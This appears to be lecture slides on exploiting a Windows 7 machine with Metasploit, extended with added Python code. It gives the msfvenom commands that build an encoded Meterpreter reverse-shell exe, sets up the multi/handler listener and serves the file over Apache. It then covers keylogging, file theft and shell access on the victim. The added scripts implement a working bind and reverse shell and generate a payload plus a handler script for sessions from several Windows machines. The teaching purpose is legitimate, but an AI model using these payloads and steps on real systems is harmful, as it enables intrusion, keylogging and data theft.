Lect24&25 - Exploit Using Metasploit

The document outlines methods for exploiting systems using Metasploit, focusing on bind and reverse shells. It details the use of Msfvenom for creating payloads and Meterpreter for post-exploitation activities on Windows systems. Instructions for exploiting a Windows 7 machine are provided, including setting up listeners, generating payloads, and executing commands to access and manipulate data on the victim's machine.

Uploaded by

ch.sania9999

Exploit using Metasploit

Shell Binding

There are a number of ways that you can bind your shell to a port.

Types of shells: Bind Shell and Reverse Shell


Bind shell
• A bind shell opens a new listening service on the victim machine; the attacker must connect to it in order to get a session.
• Take cmd.exe and bind it to a local TCP port: anyone connecting to that port is presented with a command prompt belonging to that computer. This is known as a BIND SHELL.
• To establish the session, the target binds its cmd.exe process to a TCP port on its machine, and the attacker, knowing that port, connects to it as a client.
• In short: with a bind shell the listening port is opened on the victim machine, and the connection is made from the attacker's machine inward, so it only works if the victim's port is reachable (no NAT, no inbound-blocking firewall).
Reverse Shell
A reverse shell is the exact opposite:
• The attacker first sets up a listener on their own box; the target machine acts as a client and connects back to that listener; the attacker then receives the shell.
• The listening port is on the attacking machine, and the connection is made from the victim outward, which is why it passes through NAT and through firewalls that allow outbound traffic.
When to use a reverse shell?

If you find yourself in one of the following scenarios, consider using a reverse shell:
• The target machine is behind NAT or in a different private network, so you cannot reach a port it opens.
• The target machine's firewall blocks incoming connection attempts (outbound connections are usually allowed).
• Your payload is unable to bind to the port it wants, for whatever reason.
• You simply can't decide what to choose: a reverse shell is the safer default.
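The two connection directions described above, as an added example that is not part of the slides: a minimal bind shell and a minimal reverse shell in Python, with both the "victim" and the "attacker" side running in one process on 127.0.0.1 (lab only). The port numbers are chosen by the OS and the `__END__` marker is an assumed framing convention for this demo, not Metasploit's protocol; the only thing that differs between the two functions is who dials the TCP connection.

```python
"""Bind shell vs reverse shell, both sides on 127.0.0.1 in one process (lab only)."""
import socket
import subprocess
import threading

HOST = "127.0.0.1"          # loopback only: a real shell must never be left on 0.0.0.0
END = b"__END__\n"          # assumed framing marker; Metasploit uses its own TLV protocol


def run_command(cmd: str) -> bytes:
    """The shell side: execute one command line and hand back its output."""
    result = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
    return result.stdout + result.stderr


def serve_shell(conn: socket.socket) -> None:
    """Victim-side loop, identical for both shell types: only who dials differs."""
    with conn, conn.makefile("rb") as rf:
        for line in rf:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            conn.sendall(run_command(cmd) + b"\n" + END)


def attacker_session(conn: socket.socket, cmd: str) -> str:
    """Attacker-side: send one command, collect output up to the marker, then quit."""
    out = b""
    with conn, conn.makefile("rb") as rf:
        conn.sendall(cmd.encode() + b"\n")
        for line in rf:
            if line == END:
                break
            out += line
        conn.sendall(b"exit\n")
    return out.decode().strip()


def _listen() -> socket.socket:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))             # port 0: let the OS pick a free port
    srv.listen(1)
    return srv


def bind_shell(cmd: str) -> str:
    """Bind shell: the VICTIM listens, the attacker connects in.
    This is what NAT or an inbound-blocking firewall on the victim defeats."""
    victim_port = _listen()
    port = victim_port.getsockname()[1]

    def victim():
        conn, _ = victim_port.accept()
        victim_port.close()
        serve_shell(conn)

    t = threading.Thread(target=victim, daemon=True)
    t.start()
    attacker_conn = socket.create_connection((HOST, port))   # attacker -> victim
    out = attacker_session(attacker_conn, cmd)
    t.join(timeout=10)
    return out


def reverse_shell(cmd: str) -> str:
    """Reverse shell: the ATTACKER listens (cf. exploit/multi/handler) and the
    victim connects back out, so only outbound traffic from the victim is needed."""
    listener = _listen()
    port = listener.getsockname()[1]

    def victim():
        serve_shell(socket.create_connection((HOST, port)))  # victim -> attacker

    t = threading.Thread(target=victim, daemon=True)
    t.start()
    attacker_conn, _ = listener.accept()
    listener.close()
    out = attacker_session(attacker_conn, cmd)
    t.join(timeout=10)
    return out


if __name__ == "__main__":
    print("bind    :", bind_shell("echo hello-from-bind"))
    print("reverse :", reverse_shell("echo hello-from-reverse"))
```

Run it and both calls return the command's output; then imagine a host firewall that drops inbound SYNs on the victim: `bind_shell` can no longer be reached, while `reverse_shell` still works because the victim initiates the connection. That asymmetry is the whole reason the Windows 7 walkthrough below uses a reverse payload and a listener on Kali.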
Start services of postgresql
• PostgreSQL (pronounced "post-gress-Q-L") is an open source relational database management system (DBMS) developed by a worldwide team of volunteers.
• Metasploit uses it to store workspaces, hosts, services and loot. msfconsole still starts without it (it only warns that no database is connected), but the database-backed commands need it.

Before you start exploiting, start the postgresql service:

• service postgresql start
MSFVENOM

Exploiting using Msfvenom
• Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
• Note: msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.
• The advantages of msfvenom are:
  • One single tool that both creates and encodes payloads
  • Standardized command line options
  • Increased speed
Exploiting using Msfvenom
Msfvenom has a wide range of options available (-h for help). Example:

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python

• -a x86 / --platform Windows: target architecture and operating system
• -p windows/shell/bind_tcp: the payload (here a staged bind shell, see above)
• -e x86/shikata_ga_nai -i 3: encode the payload three times with the shikata_ga_nai encoder
• -b '\x00': bytes the output must not contain (the NULL byte terminates C strings, so it would cut the payload short in many string-based exploits)
• -f python: emit the bytes as Python source (buf += b"...") rather than as a raw file
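An added example, not from the slides: a parser for the `-f python` output format shown above, together with the check that the encoded bytes really avoid the characters given to `-b`. The two sample buffers are constructed for the parser (a handful of bytes laid out the way msfvenom prints them, not real shellcode), and `parse_badchars` accepts the same `'\x00\x0a\x0d'` spelling that msfvenom's `-b` takes.

```python
"""Parse msfvenom -f python output and check it against the -b bad-character list."""
import ast
import codecs
import re

# Constructed samples in the layout msfvenom -f python emits. They are a handful of
# bytes for the parser, NOT real shellcode (real output is several hundred bytes).
SAMPLE_CLEAN = r'''buf =  b""
buf += b"\xda\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
buf += b"\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\x4a"
'''

# Same layout with NULL bytes in it: exactly what -b '\x00' exists to prevent.
SAMPLE_DIRTY = r'''buf =  b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31"
'''

LINE_RE = re.compile(r'^\s*buf\s*(?:\+=|=)\s*(.+?)\s*$')


def parse_msfvenom_python(text: str) -> bytes:
    """Rebuild the raw payload bytes from msfvenom -f python output.
    Accepts the b"..." form and the older Python-2 style "..." form."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # blank lines or comments
        chunk = ast.literal_eval(m.group(1))
        if isinstance(chunk, str):        # Python-2 style output: one char == one byte
            chunk = chunk.encode("latin-1")
        out += chunk
    return bytes(out)


def parse_badchars(spec: str) -> bytes:
    r"""Turn the argument given to -b, e.g. '\x00\x0a\x0d', into bytes."""
    return codecs.decode(spec, "unicode_escape").encode("latin-1")


def find_bad_chars(payload: bytes, bad: bytes) -> dict:
    """Map each bad byte found to the offsets where it occurs; {} means clean.
    msfvenom's encoders make the same check on their own output (decoder stub
    included) and report an error if a bad byte remains after encoding."""
    hits = {}
    for b in bad:
        offsets = [i for i, x in enumerate(payload) if x == b]
        if offsets:
            hits[b] = offsets
    return hits


def is_clean(text: str, badspec: str) -> bool:
    """One-call form: True if the -f python output avoids every byte in badspec."""
    return not find_bad_chars(parse_msfvenom_python(text), parse_badchars(badspec))


if __name__ == "__main__":
    payload = parse_msfvenom_python(SAMPLE_CLEAN)
    print(len(payload), "bytes:", payload.hex())
    print("clean sample vs -b '\\x00':", is_clean(SAMPLE_CLEAN, r"\x00"))
    print("dirty sample vs -b '\\x00':",
          find_bad_chars(parse_msfvenom_python(SAMPLE_DIRTY), parse_badchars(r"\x00")))
```

Paste real `-f python` output into `SAMPLE_CLEAN` to use it for real; the offsets returned for a dirty buffer are what you would feed back into the bad-character list or a different encoder choice.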
Meterpreter
• Meterpreter is an advanced payload that enhances post exploitation.
• Typically a Meterpreter payload is multistage (staged): a minimal stager is sent as part of the exploit, and the much larger Meterpreter stage is uploaded after code execution has been accomplished. That is what the "/" in windows/meterpreter/reverse_tcp denotes; windows/meterpreter_reverse_tcp is the single-stage (stageless) form.
• Current Metasploit versions encrypt Meterpreter's own command channel (its TLV packets) regardless of transport. The reverse_tcp transport adds no TLS of its own, so on the wire it is still a non-standard TCP stream; reverse_https wraps the session in TLS and blends in with web traffic.
Meterpreter
• Metasploit's most popular payload is Meterpreter, which lets you do all sorts of things on the target system from one tool and gives full control of the victim machine. For example:
  • Upload files to and download files from the system
  • Take screenshots
  • Collect password hashes
  • Monitor keystrokes (keylogging)
  • Drop into a native command shell
Exploiting Windows 7 System using Reverse Shell

• exploit/multi/handler
• This module provides all of the features of the Metasploit payload system on different platforms and architectures. It is the generic listener that catches the connection from a payload generated outside Metasploit (here, with msfvenom), so the PAYLOAD, LHOST and LPORT set on the handler must match what the payload was built with.
Exploiting Windows 7
1. Open a 1st terminal and type:
msfconsole

2. Open a 2nd terminal and type:
service postgresql start
• Once the prompt returns, you can close this terminal; the service keeps running.

3. Go back to the 1st terminal and type:
• use exploit/multi/handler
• set PAYLOAD windows/meterpreter/reverse_tcp

4. Type:
• show options
• If LHOST or LPORT are not set, set them. LHOST is the IP of the Kali machine. LPORT defaults to 4444 on both the handler and the msfvenom payload, so it only needs changing if you choose a different port (and then it must be changed in both places).

5. set LHOST IP_OF_KALI
• set LHOST 192.168.137.134

6. Open a new terminal and type msfvenom -h to see the available options.
The msfvenom options needed to generate the payload:

-p payload
-a architecture
-e encoder
-i iterations
-f format
--platform operating system
-o output file (or redirect stdout with >)

7. Now create the payload in the form of an exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.134 --platform windows -a x86 -e x86/shikata_ga_nai -i 8 -f exe > security.exe

• -p windows/meterpreter/reverse_tcp: the same payload that was set on the handler in step 3
• LHOST=192.168.137.134: no space around "=", and the same address as in step 5
• -e x86/shikata_ga_nai -i 8: the encoder used in this tutorial, applied 8 times (the option is a lowercase -i; encoding alone does not reliably evade current antivirus, so expect a default Windows install to flag the file)
• The payload security.exe is created in the current directory (the Desktop, if the terminal was opened there).
8. Now copy security.exe (the payload) to the Windows PC, either with a pendrive or by transferring it over HTTP from Apache or a Python web server.

Transfer through HTTP

To serve a file over Apache, copy it to /var/www/html and start the Apache service. Apache is installed by default in Kali:

cp security.exe /var/www/html
service apache2 start

8b. Downloading the file on Windows

If you have desktop access, browse to http://YOUR-KALI-IP/ and use the browser to download the file:

http://192.168.137.134/security.exe

8c. The file appears in the Windows default Downloads folder.
9. Go to the 1st terminal and type:
exploit
• The handler now waits for the connection (exploit -j runs it as a background job and keeps the console free).

10. Go to the Windows system and double-click the exe.

11. Meterpreter opens on Kali: the payload connected back to the listener and a meterpreter > prompt appears.
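An added example, not from the slides: steps 3, 4, 5, 7 and 9 collapsed into one configuration, so that the msfvenom command and the handler cannot disagree on PAYLOAD, LHOST or LPORT (the most common reason a session never arrives). It writes a msfconsole resource script (run with `msfconsole -q -r handler.rc`), builds the msfvenom argument list, and `check_pairing` parses both back and reports any mismatch. The IP and filename are the lab values from the slides; the `AutoRunScript` line is an optional addition that migrates out of security.exe as soon as the session arrives.

```python
"""One config for both the msfvenom payload and the multi/handler listener."""
import shlex

# Lab values from the slides; the IP is the Kali box in that lab, not a real target.
LAB = {
    "payload": "windows/meterpreter/reverse_tcp",
    "lhost": "192.168.137.134",
    "lport": 4444,
    "arch": "x86",
    "platform": "windows",
    "encoder": "x86/shikata_ga_nai",
    "iterations": 8,
    "out": "security.exe",
}


def msfvenom_argv(cfg: dict) -> list:
    """Slide step 7 as an argv list (no shell-quoting mistakes, no 'LHOST =' typo)."""
    return [
        "msfvenom",
        "-p", cfg["payload"],
        f"LHOST={cfg['lhost']}", f"LPORT={cfg['lport']}",
        "--platform", cfg["platform"], "-a", cfg["arch"],
        "-e", cfg["encoder"], "-i", str(cfg["iterations"]),
        "-f", "exe", "-o", cfg["out"],
    ]


def handler_rc(cfg: dict) -> str:
    """Slide steps 3, 4, 5 and 9 as a resource script for msfconsole -q -r handler.rc."""
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {cfg['payload']}",
        f"set LHOST {cfg['lhost']}",
        f"set LPORT {cfg['lport']}",
        "set ExitOnSession false",                        # keep listening after the first session
        "set AutoRunScript post/windows/manage/migrate",  # optional: migrate out of security.exe on arrival
        "exploit -j",                                     # background job; the console stays usable
    ]
    return "\n".join(lines) + "\n"


def payload_settings(argv: list) -> dict:
    """Read PAYLOAD/LHOST/LPORT back out of a msfvenom command line."""
    s = {"LPORT": "4444"}                 # msfvenom's default when LPORT is not given
    for i, tok in enumerate(argv):
        if tok == "-p" and i + 1 < len(argv):
            s["PAYLOAD"] = argv[i + 1]
        elif "=" in tok and tok.split("=", 1)[0].isupper():
            k, v = tok.split("=", 1)
            s[k] = v
    return s


def handler_settings(rc: str) -> dict:
    """Read the 'set' lines back out of a resource script."""
    s = {"LPORT": "4444"}                 # multi/handler's default as well
    for line in rc.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "set":
            s[parts[1].upper()] = parts[2]
    return s


def check_pairing(argv: list, rc: str) -> list:
    """Mismatches between payload and handler; an empty list means they agree."""
    p, h = payload_settings(argv), handler_settings(rc)
    return [
        f"{key}: payload={p.get(key)!r} handler={h.get(key)!r}"
        for key in ("PAYLOAD", "LHOST", "LPORT")
        if p.get(key) != h.get(key)
    ]


if __name__ == "__main__":
    argv, rc = msfvenom_argv(LAB), handler_rc(LAB)
    assert check_pairing(argv, rc) == []
    with open("handler.rc", "w") as fh:
        fh.write(rc)
    print(shlex.join(argv))              # paste this into the Kali terminal
    print("then: msfconsole -q -r handler.rc")
```

Running the script prints the exact msfvenom line to type and leaves handler.rc next to it; because the listener is started with ExitOnSession false and exploit -j, several Windows machines running security.exe each get their own session instead of the first one closing the handler.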
Obtained Meterpreter
Now access the data of the Windows machine and breach its security.
Exploiting Windows 7: Run commands to access data

Keystrokes
1. keyscan_start
• Start the key scanner on the victim's machine. Open a Notepad/Word file and write something into it.
• The keylogger only sees input to the desktop of the process Meterpreter is running in. If nothing is captured, first migrate into a process that owns the interactive desktop (find the PID of explorer.exe with ps, then migrate to it) and start the scanner again.
2. keyscan_dump
• Prints the logged keys on screen.
3. keyscan_stop
• Stops the key scanner on the victim's machine.
4. sysinfo
• Print the system information (hostname, OS version, architecture, domain, logged-on users).

5. pwd
• Show the present working directory on the victim.

6. ls
• List the contents of the current directory on the victim.

7. Change directory
• cd C:\\
• The backslash is doubled because the Meterpreter console treats a single \ as an escape character.

8. Local (Kali-side) working directory
• lpwd
9. mkdir dirname
• Create a folder on the victim's machine:
• mkdir mehak
• ls (to confirm it appeared)

10. rmdir dirname
• Remove the folder from the victim's machine:
• rmdir mehak
11. getuid
• Show the user Meterpreter is running as: the user who double-clicked security.exe, so not an administrator unless that user is one.

12. shell
• Open a Windows command shell of the victim PC on Kali; run ipconfig in it to see all the network details.
• Type exit to return to the meterpreter prompt.
13. On the Windows machine create a text file sample.txt and write something into it. Then on Kali run:
• cat sample.txt
• This displays the whole content of that file. Anything the compromised user can read, the attacker can read too, so sensitive information should never sit in plain text files.
• Check with ls that the file is there first.

14. download sample.txt
• Downloads the file to Kali, into the local working directory shown by lpwd.

15. upload sample.txt E:\\
• Uploads the file into the E: drive of the Windows machine.
In class task
• Open the file already created on the Desktop and change its content (an integrity violation).
• Change the working directory to the root of the C: drive.

Important reading:
• https://www.exploit-db.com/docs/english/18229-white-paper--post-exploitation-using-meterpreter.pdf

Reference: https://www.youtube.com/watch?v=RGJcaUL-9aw
